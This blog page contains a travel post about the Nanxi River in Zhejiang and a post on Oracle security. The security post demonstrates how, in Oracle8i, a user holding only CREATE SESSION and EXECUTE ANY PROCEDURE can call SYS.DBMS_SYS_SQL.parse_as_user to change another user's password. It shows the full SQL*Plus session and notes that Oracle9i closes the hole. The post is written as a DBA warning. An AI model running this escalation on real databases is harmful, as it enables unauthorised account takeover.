May 10, 2005
楠溪江之美
作者:eygle
出处:http://blog.eygle.com
朋友五一后发来的图片,查了一下,原来楠溪江是这样有名的一个地方:
楠溪江位于浙江省温州市北部的永嘉县境内,东临雁荡,南距温州,西连仙都,北接仙居,景区面积达625平方公里,被誉为“中国山水画摇篮”。2002年被国家旅游局评为国家4A级旅游区。
楠溪江,融天然山水、田园风光、人文景观于一体,以“水秀、岩奇、瀑多、村古、滩林美”的独有特色而闻名。其中以清澈见底的江水和众多保存完好的古村落为最。经检定,江水中的含沙量仅为每立方米万分之一克,PH值为7,被专家们誉为“天下第一水”。而那些以“七星八斗”、“文房四宝”以及以阴阳风水等思想构筑的古村落,更是为楠溪江增添了无穷魅力。
当代著名作家汪曾祺,曾经大声宣布:“我可以负责任地向全世界宣告:楠溪江是很美的!”其激动之情溢于言表。
Posted by eygle at 2:10 PM | Comments (2)
Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?
作者:eygle
出处:http://blog.eygle.com
TOM曾经多次说过:All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and I can totally do anything I want to in your database.那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?
让我们通过一个例子来认识这个危险.
1.创建测试用户
$ sqlplus "/ as sysdba" SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005 (c) Copyright 2000 Oracle Corporation. All rights reserved. Connected to: Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production With the Partitioning option JServer Release 8.1.7.4.0 - 64bit Production SQL> create user hacker identified by hacker default tablespace users temporary 2 tablespace temp; User created. SQL> grant create session to hacker; Grant succeeded. SQL> grant execute any procedure to hacker; Grant succeeded. SQL> create user loser identified by loser default tablespace users temporary 2 tablespace temp; User created. SQL> grant connect to loser; Grant succeeded. |
2.使用测试用户连接
注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。
SQL> connect hacker/hacker Connected. SQL> desc sys.dbms_sys_sql PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN N_TAB TABLE OF NUMBER IN PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN C_TAB TABLE OF VARCHAR2(2000) IN .... PROCEDURE VARIABLE_VALUE_ROWID Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN VALUE ROWID OUT |
3.这意味着什么?
SQL> connect hacker/hacker Connected. SQL> DECLARE 2 UID NUMBER; 3 sqltext VARCHAR2 (100) := 'alter user loser identified by test'; 4 c INTEGER; 5 BEGIN 6 c := SYS.DBMS_SYS_SQL.open_cursor (); 7 SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0); 8 SYS.DBMS_SYS_SQL.close_cursor (c); 9 END; 10 / PL/SQL procedure successfully completed. |
通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。
用户loser的口令已被更改:
SQL> connect loser/loser ERROR: ORA-01017: invalid username/password; logon denied Warning: You are no longer connected to ORACLE. SQL> connect loser/test Connected. SQL> |
4.注意版本
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
SQL> grant execute any procedure to test; Grant succeeded. Elapsed: 00:00:00.33 SQL> connect test/test Connected. SQL> desc dbms_sys_sql ERROR: ORA-04043: object dbms_sys_sql does not exist SQL> desc sys.dbms_sys_sql ERROR: ORA-04043: object sys.dbms_sys_sql does not exist SQL> select * from v$version; BANNER ---------------------------------------------------------------- Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production PL/SQL Release 9.2.0.4.0 - Production CORE 9.2.0.3.0 Production TNS for Linux: Version 9.2.0.4.0 - Production NLSRTL Version 9.2.0.4.0 - Production Elapsed: 00:00:00.32 |
Oracle的世界也正在变得更加安全。
Posted by eygle at 10:19 AM | Comments (3)